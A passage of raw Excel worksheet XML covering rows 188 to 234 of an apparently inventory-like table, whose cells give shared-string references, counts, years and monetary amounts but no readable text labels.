      <c r="L188" s="238" t="s">
        <v>1799</v>
      </c>
    </row>
    <row r="189" customHeight="1" spans="2:12">
      <c r="B189" s="16">
        <v>183</v>
      </c>
      <c r="C189" s="237" t="s">
        <v>1811</v>
      </c>
      <c r="D189" s="238" t="s">
        <v>1451</v>
      </c>
      <c r="E189" s="238" t="s">
        <v>1349</v>
      </c>
      <c r="F189" s="11"/>
      <c r="G189" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H189" s="11">
        <v>4</v>
      </c>
      <c r="I189" s="237" t="s">
        <v>1461</v>
      </c>
      <c r="J189" s="126">
        <v>45000</v>
      </c>
      <c r="K189" s="188">
        <v>7424</v>
      </c>
      <c r="L189" s="238" t="s">
        <v>1799</v>
      </c>
    </row>
    <row r="190" customHeight="1" spans="2:12">
      <c r="B190" s="16">
        <v>184</v>
      </c>
      <c r="C190" s="237" t="s">
        <v>1812</v>
      </c>
      <c r="D190" s="238" t="s">
        <v>1813</v>
      </c>
      <c r="E190" s="10"/>
      <c r="F190" s="11" t="s">
        <v>1814</v>
      </c>
      <c r="G190" s="16" t="s">
        <v>466</v>
      </c>
      <c r="H190" s="11">
        <v>3</v>
      </c>
      <c r="I190" s="11">
        <v>1993</v>
      </c>
      <c r="J190" s="126">
        <v>36000</v>
      </c>
      <c r="K190" s="188">
        <v>460.8</v>
      </c>
      <c r="L190" s="238" t="s">
        <v>1799</v>
      </c>
    </row>
    <row r="191" customHeight="1" spans="2:12">
      <c r="B191" s="16">
        <v>185</v>
      </c>
      <c r="C191" s="237" t="s">
        <v>1815</v>
      </c>
      <c r="D191" s="238" t="s">
        <v>1772</v>
      </c>
      <c r="E191" s="238" t="s">
        <v>1816</v>
      </c>
      <c r="F191" s="11"/>
      <c r="G191" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H191" s="11">
        <v>1</v>
      </c>
      <c r="I191" s="237" t="s">
        <v>1013</v>
      </c>
      <c r="J191" s="126">
        <v>19700</v>
      </c>
      <c r="K191" s="188">
        <v>0</v>
      </c>
      <c r="L191" s="238" t="s">
        <v>1799</v>
      </c>
    </row>
    <row r="192" customHeight="1" spans="2:12">
      <c r="B192" s="16">
        <v>186</v>
      </c>
      <c r="C192" s="237" t="s">
        <v>1817</v>
      </c>
      <c r="D192" s="238" t="s">
        <v>1522</v>
      </c>
      <c r="E192" s="238" t="s">
        <v>1818</v>
      </c>
      <c r="F192" s="11" t="s">
        <v>1524</v>
      </c>
      <c r="G192" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H192" s="11">
        <v>2</v>
      </c>
      <c r="I192" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J192" s="126">
        <v>260000</v>
      </c>
      <c r="K192" s="188">
        <v>26880</v>
      </c>
      <c r="L192" s="238" t="s">
        <v>1819</v>
      </c>
    </row>
    <row r="193" customHeight="1" spans="2:12">
      <c r="B193" s="16">
        <v>187</v>
      </c>
      <c r="C193" s="237" t="s">
        <v>1820</v>
      </c>
      <c r="D193" s="238" t="s">
        <v>1522</v>
      </c>
      <c r="E193" s="238" t="s">
        <v>1420</v>
      </c>
      <c r="F193" s="11"/>
      <c r="G193" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H193" s="11">
        <v>1</v>
      </c>
      <c r="I193" s="237" t="s">
        <v>224</v>
      </c>
      <c r="J193" s="126">
        <v>120000</v>
      </c>
      <c r="K193" s="188">
        <v>0</v>
      </c>
      <c r="L193" s="238" t="s">
        <v>1821</v>
      </c>
    </row>
    <row r="194" customHeight="1" spans="2:12">
      <c r="B194" s="16">
        <v>188</v>
      </c>
      <c r="C194" s="237" t="s">
        <v>1822</v>
      </c>
      <c r="D194" s="238" t="s">
        <v>1823</v>
      </c>
      <c r="E194" s="238" t="s">
        <v>1641</v>
      </c>
      <c r="F194" s="11"/>
      <c r="G194" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H194" s="11">
        <v>1</v>
      </c>
      <c r="I194" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J194" s="126">
        <v>23000</v>
      </c>
      <c r="K194" s="188">
        <v>0</v>
      </c>
      <c r="L194" s="238" t="s">
        <v>1824</v>
      </c>
    </row>
    <row r="195" customHeight="1" spans="2:12">
      <c r="B195" s="16">
        <v>189</v>
      </c>
      <c r="C195" s="237" t="s">
        <v>1825</v>
      </c>
      <c r="D195" s="238" t="s">
        <v>1826</v>
      </c>
      <c r="E195" s="238" t="s">
        <v>1827</v>
      </c>
      <c r="F195" s="11" t="s">
        <v>1828</v>
      </c>
      <c r="G195" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H195" s="11">
        <v>1</v>
      </c>
      <c r="I195" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J195" s="126">
        <v>23000</v>
      </c>
      <c r="K195" s="188">
        <v>2380.8</v>
      </c>
      <c r="L195" s="238" t="s">
        <v>1824</v>
      </c>
    </row>
    <row r="196" customHeight="1" spans="2:12">
      <c r="B196" s="16">
        <v>190</v>
      </c>
      <c r="C196" s="237" t="s">
        <v>1829</v>
      </c>
      <c r="D196" s="238" t="s">
        <v>1830</v>
      </c>
      <c r="E196" s="238" t="s">
        <v>1431</v>
      </c>
      <c r="F196" s="11"/>
      <c r="G196" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H196" s="11">
        <v>3</v>
      </c>
      <c r="I196" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J196" s="126">
        <v>6000</v>
      </c>
      <c r="K196" s="188">
        <v>2784</v>
      </c>
      <c r="L196" s="238" t="s">
        <v>1824</v>
      </c>
    </row>
    <row r="197" customHeight="1" spans="2:12">
      <c r="B197" s="16">
        <v>191</v>
      </c>
      <c r="C197" s="11"/>
      <c r="D197" s="10" t="s">
        <v>1587</v>
      </c>
      <c r="E197" s="10"/>
      <c r="F197" s="11"/>
      <c r="G197" s="16" t="s">
        <v>1410</v>
      </c>
      <c r="H197" s="11">
        <v>1</v>
      </c>
      <c r="I197" s="11"/>
      <c r="J197" s="205"/>
      <c r="K197" s="188">
        <v>614.4</v>
      </c>
      <c r="L197" s="191" t="s">
        <v>1824</v>
      </c>
    </row>
    <row r="198" customHeight="1" spans="2:12">
      <c r="B198" s="16">
        <v>192</v>
      </c>
      <c r="C198" s="237" t="s">
        <v>1831</v>
      </c>
      <c r="D198" s="238" t="s">
        <v>1668</v>
      </c>
      <c r="E198" s="238" t="s">
        <v>1832</v>
      </c>
      <c r="F198" s="11"/>
      <c r="G198" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H198" s="11">
        <v>1</v>
      </c>
      <c r="I198" s="237" t="s">
        <v>1035</v>
      </c>
      <c r="J198" s="126">
        <v>10087</v>
      </c>
      <c r="K198" s="188">
        <v>1624</v>
      </c>
      <c r="L198" s="238" t="s">
        <v>1833</v>
      </c>
    </row>
    <row r="199" customHeight="1" spans="2:12">
      <c r="B199" s="16">
        <v>193</v>
      </c>
      <c r="C199" s="237" t="s">
        <v>1834</v>
      </c>
      <c r="D199" s="238" t="s">
        <v>1668</v>
      </c>
      <c r="E199" s="238" t="s">
        <v>1835</v>
      </c>
      <c r="F199" s="11"/>
      <c r="G199" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H199" s="11">
        <v>1</v>
      </c>
      <c r="I199" s="237" t="s">
        <v>1035</v>
      </c>
      <c r="J199" s="126">
        <v>7936</v>
      </c>
      <c r="K199" s="188">
        <v>1624</v>
      </c>
      <c r="L199" s="238" t="s">
        <v>1833</v>
      </c>
    </row>
    <row r="200" customHeight="1" spans="2:12">
      <c r="B200" s="16">
        <v>194</v>
      </c>
      <c r="C200" s="237" t="s">
        <v>1836</v>
      </c>
      <c r="D200" s="238" t="s">
        <v>1668</v>
      </c>
      <c r="E200" s="238" t="s">
        <v>1837</v>
      </c>
      <c r="F200" s="11"/>
      <c r="G200" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H200" s="11">
        <v>1</v>
      </c>
      <c r="I200" s="237" t="s">
        <v>1035</v>
      </c>
      <c r="J200" s="126">
        <v>6144</v>
      </c>
      <c r="K200" s="188">
        <v>1624</v>
      </c>
      <c r="L200" s="238" t="s">
        <v>1833</v>
      </c>
    </row>
    <row r="201" customHeight="1" spans="2:12">
      <c r="B201" s="16">
        <v>195</v>
      </c>
      <c r="C201" s="237" t="s">
        <v>1838</v>
      </c>
      <c r="D201" s="238" t="s">
        <v>1668</v>
      </c>
      <c r="E201" s="238" t="s">
        <v>1839</v>
      </c>
      <c r="F201" s="11"/>
      <c r="G201" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H201" s="11">
        <v>1</v>
      </c>
      <c r="I201" s="237" t="s">
        <v>1035</v>
      </c>
      <c r="J201" s="126">
        <v>8580</v>
      </c>
      <c r="K201" s="188">
        <v>1624</v>
      </c>
      <c r="L201" s="238" t="s">
        <v>1833</v>
      </c>
    </row>
    <row r="202" customHeight="1" spans="2:12">
      <c r="B202" s="16">
        <v>196</v>
      </c>
      <c r="C202" s="237" t="s">
        <v>1840</v>
      </c>
      <c r="D202" s="238" t="s">
        <v>1668</v>
      </c>
      <c r="E202" s="238" t="s">
        <v>1841</v>
      </c>
      <c r="F202" s="11"/>
      <c r="G202" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H202" s="11">
        <v>1</v>
      </c>
      <c r="I202" s="237" t="s">
        <v>322</v>
      </c>
      <c r="J202" s="126">
        <v>56000</v>
      </c>
      <c r="K202" s="188">
        <v>1624</v>
      </c>
      <c r="L202" s="238" t="s">
        <v>1833</v>
      </c>
    </row>
    <row r="203" customHeight="1" spans="2:12">
      <c r="B203" s="16">
        <v>197</v>
      </c>
      <c r="C203" s="237" t="s">
        <v>1842</v>
      </c>
      <c r="D203" s="238" t="s">
        <v>1668</v>
      </c>
      <c r="E203" s="238" t="s">
        <v>1843</v>
      </c>
      <c r="F203" s="11"/>
      <c r="G203" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H203" s="11">
        <v>2</v>
      </c>
      <c r="I203" s="237" t="s">
        <v>322</v>
      </c>
      <c r="J203" s="126">
        <v>25200</v>
      </c>
      <c r="K203" s="188">
        <v>3248</v>
      </c>
      <c r="L203" s="238" t="s">
        <v>1833</v>
      </c>
    </row>
    <row r="204" customHeight="1" spans="2:12">
      <c r="B204" s="16">
        <v>198</v>
      </c>
      <c r="C204" s="237" t="s">
        <v>1844</v>
      </c>
      <c r="D204" s="238" t="s">
        <v>1668</v>
      </c>
      <c r="E204" s="238" t="s">
        <v>1845</v>
      </c>
      <c r="F204" s="11"/>
      <c r="G204" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H204" s="11">
        <v>1</v>
      </c>
      <c r="I204" s="237" t="s">
        <v>322</v>
      </c>
      <c r="J204" s="126">
        <v>14600</v>
      </c>
      <c r="K204" s="188">
        <v>1624</v>
      </c>
      <c r="L204" s="238" t="s">
        <v>1833</v>
      </c>
    </row>
    <row r="205" customHeight="1" spans="2:12">
      <c r="B205" s="16">
        <v>199</v>
      </c>
      <c r="C205" s="237" t="s">
        <v>1846</v>
      </c>
      <c r="D205" s="238" t="s">
        <v>1668</v>
      </c>
      <c r="E205" s="238" t="s">
        <v>1847</v>
      </c>
      <c r="F205" s="11"/>
      <c r="G205" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H205" s="11">
        <v>1</v>
      </c>
      <c r="I205" s="237" t="s">
        <v>322</v>
      </c>
      <c r="J205" s="126">
        <v>9800</v>
      </c>
      <c r="K205" s="188">
        <v>1624</v>
      </c>
      <c r="L205" s="238" t="s">
        <v>1833</v>
      </c>
    </row>
    <row r="206" customHeight="1" spans="2:12">
      <c r="B206" s="16">
        <v>200</v>
      </c>
      <c r="C206" s="237" t="s">
        <v>1848</v>
      </c>
      <c r="D206" s="238" t="s">
        <v>1668</v>
      </c>
      <c r="E206" s="238" t="s">
        <v>1849</v>
      </c>
      <c r="F206" s="11"/>
      <c r="G206" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H206" s="11">
        <v>1</v>
      </c>
      <c r="I206" s="237" t="s">
        <v>322</v>
      </c>
      <c r="J206" s="126">
        <v>26000</v>
      </c>
      <c r="K206" s="188">
        <v>1624</v>
      </c>
      <c r="L206" s="238" t="s">
        <v>1833</v>
      </c>
    </row>
    <row r="207" customHeight="1" spans="2:12">
      <c r="B207" s="16">
        <v>201</v>
      </c>
      <c r="C207" s="237" t="s">
        <v>1850</v>
      </c>
      <c r="D207" s="238" t="s">
        <v>1668</v>
      </c>
      <c r="E207" s="238" t="s">
        <v>1669</v>
      </c>
      <c r="F207" s="11"/>
      <c r="G207" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H207" s="11">
        <v>22</v>
      </c>
      <c r="I207" s="237" t="s">
        <v>1670</v>
      </c>
      <c r="J207" s="126">
        <v>551717</v>
      </c>
      <c r="K207" s="188">
        <v>45936</v>
      </c>
      <c r="L207" s="238" t="s">
        <v>1851</v>
      </c>
    </row>
    <row r="208" customHeight="1" spans="2:12">
      <c r="B208" s="16">
        <v>202</v>
      </c>
      <c r="C208" s="237" t="s">
        <v>1852</v>
      </c>
      <c r="D208" s="238" t="s">
        <v>1716</v>
      </c>
      <c r="E208" s="238" t="s">
        <v>1853</v>
      </c>
      <c r="F208" s="11" t="s">
        <v>1524</v>
      </c>
      <c r="G208" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H208" s="11">
        <v>1</v>
      </c>
      <c r="I208" s="237" t="s">
        <v>343</v>
      </c>
      <c r="J208" s="126">
        <v>460000</v>
      </c>
      <c r="K208" s="188">
        <v>59040</v>
      </c>
      <c r="L208" s="238" t="s">
        <v>1854</v>
      </c>
    </row>
    <row r="209" customHeight="1" spans="2:12">
      <c r="B209" s="16">
        <v>203</v>
      </c>
      <c r="C209" s="237" t="s">
        <v>1855</v>
      </c>
      <c r="D209" s="238" t="s">
        <v>1716</v>
      </c>
      <c r="E209" s="238" t="s">
        <v>1853</v>
      </c>
      <c r="F209" s="11" t="s">
        <v>1524</v>
      </c>
      <c r="G209" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H209" s="11">
        <v>1</v>
      </c>
      <c r="I209" s="237" t="s">
        <v>343</v>
      </c>
      <c r="J209" s="126">
        <v>205000</v>
      </c>
      <c r="K209" s="188">
        <v>59040</v>
      </c>
      <c r="L209" s="238" t="s">
        <v>1851</v>
      </c>
    </row>
    <row r="210" customHeight="1" spans="2:12">
      <c r="B210" s="16">
        <v>204</v>
      </c>
      <c r="C210" s="237" t="s">
        <v>1856</v>
      </c>
      <c r="D210" s="238" t="s">
        <v>1668</v>
      </c>
      <c r="E210" s="238" t="s">
        <v>1857</v>
      </c>
      <c r="F210" s="11"/>
      <c r="G210" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H210" s="11">
        <v>1</v>
      </c>
      <c r="I210" s="237" t="s">
        <v>1035</v>
      </c>
      <c r="J210" s="126">
        <v>9430</v>
      </c>
      <c r="K210" s="188">
        <v>1624</v>
      </c>
      <c r="L210" s="238" t="s">
        <v>1858</v>
      </c>
    </row>
    <row r="211" customHeight="1" spans="2:12">
      <c r="B211" s="16">
        <v>205</v>
      </c>
      <c r="C211" s="237" t="s">
        <v>1859</v>
      </c>
      <c r="D211" s="238" t="s">
        <v>1668</v>
      </c>
      <c r="E211" s="238" t="s">
        <v>1860</v>
      </c>
      <c r="F211" s="11"/>
      <c r="G211" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H211" s="11">
        <v>1</v>
      </c>
      <c r="I211" s="237" t="s">
        <v>1035</v>
      </c>
      <c r="J211" s="126">
        <v>7337</v>
      </c>
      <c r="K211" s="188">
        <v>1624</v>
      </c>
      <c r="L211" s="238" t="s">
        <v>1858</v>
      </c>
    </row>
    <row r="212" customHeight="1" spans="2:12">
      <c r="B212" s="16">
        <v>206</v>
      </c>
      <c r="C212" s="237" t="s">
        <v>1861</v>
      </c>
      <c r="D212" s="238" t="s">
        <v>1426</v>
      </c>
      <c r="E212" s="238" t="s">
        <v>1862</v>
      </c>
      <c r="F212" s="11"/>
      <c r="G212" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H212" s="11">
        <v>1</v>
      </c>
      <c r="I212" s="237" t="s">
        <v>587</v>
      </c>
      <c r="J212" s="126">
        <v>3100</v>
      </c>
      <c r="K212" s="188">
        <v>0</v>
      </c>
      <c r="L212" s="238" t="s">
        <v>1863</v>
      </c>
    </row>
    <row r="213" customHeight="1" spans="2:12">
      <c r="B213" s="16">
        <v>207</v>
      </c>
      <c r="C213" s="237" t="s">
        <v>1864</v>
      </c>
      <c r="D213" s="238" t="s">
        <v>1830</v>
      </c>
      <c r="E213" s="238" t="s">
        <v>1349</v>
      </c>
      <c r="F213" s="11"/>
      <c r="G213" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H213" s="11">
        <v>14</v>
      </c>
      <c r="I213" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J213" s="126">
        <v>32000</v>
      </c>
      <c r="K213" s="188">
        <v>12992</v>
      </c>
      <c r="L213" s="238" t="s">
        <v>1865</v>
      </c>
    </row>
    <row r="214" customHeight="1" spans="2:12">
      <c r="B214" s="16">
        <v>208</v>
      </c>
      <c r="C214" s="237" t="s">
        <v>1866</v>
      </c>
      <c r="D214" s="238" t="s">
        <v>1426</v>
      </c>
      <c r="E214" s="238" t="s">
        <v>1867</v>
      </c>
      <c r="F214" s="11"/>
      <c r="G214" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H214" s="11">
        <v>1</v>
      </c>
      <c r="I214" s="237" t="s">
        <v>1868</v>
      </c>
      <c r="J214" s="126">
        <v>61538.46</v>
      </c>
      <c r="K214" s="188">
        <v>0</v>
      </c>
      <c r="L214" s="238" t="s">
        <v>1869</v>
      </c>
    </row>
    <row r="215" customHeight="1" spans="2:12">
      <c r="B215" s="16">
        <v>209</v>
      </c>
      <c r="C215" s="237" t="s">
        <v>1870</v>
      </c>
      <c r="D215" s="238" t="s">
        <v>1871</v>
      </c>
      <c r="E215" s="238" t="s">
        <v>1585</v>
      </c>
      <c r="F215" s="11"/>
      <c r="G215" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H215" s="11">
        <v>2</v>
      </c>
      <c r="I215" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J215" s="126">
        <v>8000</v>
      </c>
      <c r="K215" s="188">
        <v>1228.8</v>
      </c>
      <c r="L215" s="238" t="s">
        <v>1872</v>
      </c>
    </row>
    <row r="216" customHeight="1" spans="2:12">
      <c r="B216" s="16">
        <v>210</v>
      </c>
      <c r="C216" s="237" t="s">
        <v>1873</v>
      </c>
      <c r="D216" s="238" t="s">
        <v>1874</v>
      </c>
      <c r="E216" s="10"/>
      <c r="F216" s="11"/>
      <c r="G216" s="16" t="s">
        <v>507</v>
      </c>
      <c r="H216" s="11">
        <v>3</v>
      </c>
      <c r="I216" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J216" s="126">
        <v>2900</v>
      </c>
      <c r="K216" s="188">
        <v>384</v>
      </c>
      <c r="L216" s="10"/>
    </row>
    <row r="217" customHeight="1" spans="2:12">
      <c r="B217" s="16">
        <v>211</v>
      </c>
      <c r="C217" s="237" t="s">
        <v>1875</v>
      </c>
      <c r="D217" s="238" t="s">
        <v>1876</v>
      </c>
      <c r="E217" s="10"/>
      <c r="F217" s="11"/>
      <c r="G217" s="16" t="s">
        <v>507</v>
      </c>
      <c r="H217" s="11">
        <v>2</v>
      </c>
      <c r="I217" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J217" s="126">
        <v>1000</v>
      </c>
      <c r="K217" s="188">
        <v>64</v>
      </c>
      <c r="L217" s="10"/>
    </row>
    <row r="218" customHeight="1" spans="2:12">
      <c r="B218" s="16">
        <v>212</v>
      </c>
      <c r="C218" s="237" t="s">
        <v>1877</v>
      </c>
      <c r="D218" s="238" t="s">
        <v>1878</v>
      </c>
      <c r="E218" s="10"/>
      <c r="F218" s="11"/>
      <c r="G218" s="16" t="s">
        <v>507</v>
      </c>
      <c r="H218" s="11">
        <v>1</v>
      </c>
      <c r="I218" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J218" s="14">
        <v>600</v>
      </c>
      <c r="K218" s="188">
        <v>38.4</v>
      </c>
      <c r="L218" s="10"/>
    </row>
    <row r="219" customHeight="1" spans="2:12">
      <c r="B219" s="16">
        <v>213</v>
      </c>
      <c r="C219" s="237" t="s">
        <v>1879</v>
      </c>
      <c r="D219" s="238" t="s">
        <v>1880</v>
      </c>
      <c r="E219" s="10"/>
      <c r="F219" s="11"/>
      <c r="G219" s="16" t="s">
        <v>507</v>
      </c>
      <c r="H219" s="11">
        <v>1</v>
      </c>
      <c r="I219" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J219" s="14">
        <v>600</v>
      </c>
      <c r="K219" s="188">
        <v>38.4</v>
      </c>
      <c r="L219" s="10"/>
    </row>
    <row r="220" customHeight="1" spans="2:12">
      <c r="B220" s="16">
        <v>214</v>
      </c>
      <c r="C220" s="237" t="s">
        <v>1881</v>
      </c>
      <c r="D220" s="238" t="s">
        <v>1492</v>
      </c>
      <c r="E220" s="10"/>
      <c r="F220" s="11"/>
      <c r="G220" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H220" s="11">
        <v>4</v>
      </c>
      <c r="I220" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J220" s="126">
        <v>8800</v>
      </c>
      <c r="K220" s="188">
        <v>3712</v>
      </c>
      <c r="L220" s="10" t="s">
        <v>1882</v>
      </c>
    </row>
    <row r="221" customHeight="1" spans="2:12">
      <c r="B221" s="16">
        <v>215</v>
      </c>
      <c r="C221" s="237" t="s">
        <v>1883</v>
      </c>
      <c r="D221" s="238" t="s">
        <v>1880</v>
      </c>
      <c r="E221" s="10"/>
      <c r="F221" s="11"/>
      <c r="G221" s="16" t="s">
        <v>507</v>
      </c>
      <c r="H221" s="11">
        <v>1</v>
      </c>
      <c r="I221" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J221" s="14">
        <v>600</v>
      </c>
      <c r="K221" s="188">
        <v>38.4</v>
      </c>
      <c r="L221" s="10"/>
    </row>
    <row r="222" customHeight="1" spans="2:12">
      <c r="B222" s="16">
        <v>216</v>
      </c>
      <c r="C222" s="237" t="s">
        <v>1884</v>
      </c>
      <c r="D222" s="238" t="s">
        <v>1880</v>
      </c>
      <c r="E222" s="10"/>
      <c r="F222" s="11"/>
      <c r="G222" s="16" t="s">
        <v>507</v>
      </c>
      <c r="H222" s="11">
        <v>1</v>
      </c>
      <c r="I222" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J222" s="14">
        <v>600</v>
      </c>
      <c r="K222" s="188">
        <v>38.4</v>
      </c>
      <c r="L222" s="10"/>
    </row>
    <row r="223" customHeight="1" spans="2:12">
      <c r="B223" s="16">
        <v>217</v>
      </c>
      <c r="C223" s="237" t="s">
        <v>1885</v>
      </c>
      <c r="D223" s="238" t="s">
        <v>1878</v>
      </c>
      <c r="E223" s="238" t="s">
        <v>1886</v>
      </c>
      <c r="F223" s="11"/>
      <c r="G223" s="16" t="s">
        <v>507</v>
      </c>
      <c r="H223" s="11">
        <v>11</v>
      </c>
      <c r="I223" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J223" s="126">
        <v>3000</v>
      </c>
      <c r="K223" s="188">
        <v>384</v>
      </c>
      <c r="L223" s="10"/>
    </row>
    <row r="224" customHeight="1" spans="2:12">
      <c r="B224" s="16">
        <v>218</v>
      </c>
      <c r="C224" s="237" t="s">
        <v>1887</v>
      </c>
      <c r="D224" s="238" t="s">
        <v>1874</v>
      </c>
      <c r="E224" s="10"/>
      <c r="F224" s="11"/>
      <c r="G224" s="16" t="s">
        <v>507</v>
      </c>
      <c r="H224" s="11">
        <v>1</v>
      </c>
      <c r="I224" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J224" s="14">
        <v>600</v>
      </c>
      <c r="K224" s="188">
        <v>38.4</v>
      </c>
      <c r="L224" s="10"/>
    </row>
    <row r="225" customHeight="1" spans="2:12">
      <c r="B225" s="16">
        <v>219</v>
      </c>
      <c r="C225" s="237" t="s">
        <v>1888</v>
      </c>
      <c r="D225" s="238" t="s">
        <v>1625</v>
      </c>
      <c r="E225" s="238" t="s">
        <v>1889</v>
      </c>
      <c r="F225" s="11"/>
      <c r="G225" s="16" t="s">
        <v>507</v>
      </c>
      <c r="H225" s="11">
        <v>2</v>
      </c>
      <c r="I225" s="237" t="s">
        <v>962</v>
      </c>
      <c r="J225" s="126">
        <v>23320</v>
      </c>
      <c r="K225" s="188">
        <v>1492.48</v>
      </c>
      <c r="L225" s="10" t="s">
        <v>1882</v>
      </c>
    </row>
    <row r="226" customHeight="1" spans="2:12">
      <c r="B226" s="16">
        <v>220</v>
      </c>
      <c r="C226" s="237" t="s">
        <v>1890</v>
      </c>
      <c r="D226" s="238" t="s">
        <v>1891</v>
      </c>
      <c r="E226" s="10"/>
      <c r="F226" s="11"/>
      <c r="G226" s="16" t="s">
        <v>466</v>
      </c>
      <c r="H226" s="11">
        <v>1</v>
      </c>
      <c r="I226" s="237" t="s">
        <v>1892</v>
      </c>
      <c r="J226" s="126">
        <v>2638306</v>
      </c>
      <c r="K226" s="188">
        <v>844257.92</v>
      </c>
      <c r="L226" s="10"/>
    </row>
    <row r="227" customHeight="1" spans="2:12">
      <c r="B227" s="16">
        <v>221</v>
      </c>
      <c r="C227" s="11"/>
      <c r="D227" s="10" t="s">
        <v>1790</v>
      </c>
      <c r="E227" s="10"/>
      <c r="F227" s="11"/>
      <c r="G227" s="16" t="s">
        <v>507</v>
      </c>
      <c r="H227" s="11">
        <v>23</v>
      </c>
      <c r="I227" s="11"/>
      <c r="J227" s="205"/>
      <c r="K227" s="188">
        <v>21344</v>
      </c>
      <c r="L227" s="191" t="s">
        <v>1893</v>
      </c>
    </row>
    <row r="228" customHeight="1" spans="2:12">
      <c r="B228" s="16">
        <v>222</v>
      </c>
      <c r="C228" s="11"/>
      <c r="D228" s="10" t="s">
        <v>1587</v>
      </c>
      <c r="E228" s="10" t="s">
        <v>1894</v>
      </c>
      <c r="F228" s="11" t="s">
        <v>1895</v>
      </c>
      <c r="G228" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H228" s="11">
        <v>4</v>
      </c>
      <c r="I228" s="11" t="s">
        <v>1896</v>
      </c>
      <c r="J228" s="205"/>
      <c r="K228" s="188">
        <v>2457.6</v>
      </c>
      <c r="L228" s="191" t="s">
        <v>1897</v>
      </c>
    </row>
    <row r="229" customHeight="1" spans="2:12">
      <c r="B229" s="16">
        <v>223</v>
      </c>
      <c r="C229" s="11"/>
      <c r="D229" s="10" t="s">
        <v>1790</v>
      </c>
      <c r="E229" s="10"/>
      <c r="F229" s="11"/>
      <c r="G229" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H229" s="11">
        <v>5</v>
      </c>
      <c r="I229" s="11"/>
      <c r="J229" s="205"/>
      <c r="K229" s="188">
        <v>4640</v>
      </c>
      <c r="L229" s="191" t="s">
        <v>1897</v>
      </c>
    </row>
    <row r="230" customHeight="1" spans="2:12">
      <c r="B230" s="16">
        <v>224</v>
      </c>
      <c r="C230" s="11"/>
      <c r="D230" s="10" t="s">
        <v>1169</v>
      </c>
      <c r="E230" s="10" t="s">
        <v>1898</v>
      </c>
      <c r="F230" s="11"/>
      <c r="G230" s="16" t="s">
        <v>507</v>
      </c>
      <c r="H230" s="11">
        <v>3</v>
      </c>
      <c r="I230" s="11">
        <v>1989</v>
      </c>
      <c r="J230" s="205"/>
      <c r="K230" s="188">
        <v>614.4</v>
      </c>
      <c r="L230" s="191" t="s">
        <v>1897</v>
      </c>
    </row>
    <row r="231" customHeight="1" spans="2:12">
      <c r="B231" s="16">
        <v>225</v>
      </c>
      <c r="C231" s="11"/>
      <c r="D231" s="10" t="s">
        <v>1899</v>
      </c>
      <c r="E231" s="10" t="s">
        <v>1773</v>
      </c>
      <c r="F231" s="11"/>
      <c r="G231" s="16" t="s">
        <v>507</v>
      </c>
      <c r="H231" s="11">
        <v>3</v>
      </c>
      <c r="I231" s="11">
        <v>2005</v>
      </c>
      <c r="J231" s="205"/>
      <c r="K231" s="188">
        <v>39648</v>
      </c>
      <c r="L231" s="191" t="s">
        <v>1897</v>
      </c>
    </row>
    <row r="232" customHeight="1" spans="2:12">
      <c r="B232" s="16">
        <v>226</v>
      </c>
      <c r="C232" s="11"/>
      <c r="D232" s="10" t="s">
        <v>1463</v>
      </c>
      <c r="E232" s="10" t="s">
        <v>1900</v>
      </c>
      <c r="F232" s="11" t="s">
        <v>1828</v>
      </c>
      <c r="G232" s="16" t="s">
        <v>507</v>
      </c>
      <c r="H232" s="11">
        <v>6</v>
      </c>
      <c r="I232" s="11">
        <v>2008</v>
      </c>
      <c r="J232" s="205"/>
      <c r="K232" s="188">
        <v>35712</v>
      </c>
      <c r="L232" s="191" t="s">
        <v>1897</v>
      </c>
    </row>
    <row r="233" customHeight="1" spans="2:12">
      <c r="B233" s="16">
        <v>227</v>
      </c>
      <c r="C233" s="11"/>
      <c r="D233" s="10" t="s">
        <v>1451</v>
      </c>
      <c r="E233" s="10" t="s">
        <v>1349</v>
      </c>
      <c r="F233" s="11"/>
      <c r="G233" s="16" t="s">
        <v>507</v>
      </c>
      <c r="H233" s="11">
        <v>10</v>
      </c>
      <c r="I233" s="11">
        <v>2011</v>
      </c>
      <c r="J233" s="205"/>
      <c r="K233" s="188">
        <v>30160</v>
      </c>
      <c r="L233" s="191" t="s">
        <v>1671</v>
      </c>
    </row>
    <row r="234" customHeight="1" spans="2:12">
      <c r="B234" s="16">
        <v>228</v>
      </c>
      <c r="C234" s="11"/>
      <c r="D234" s="10" t="s">
        <v>1901</v>
      </c>
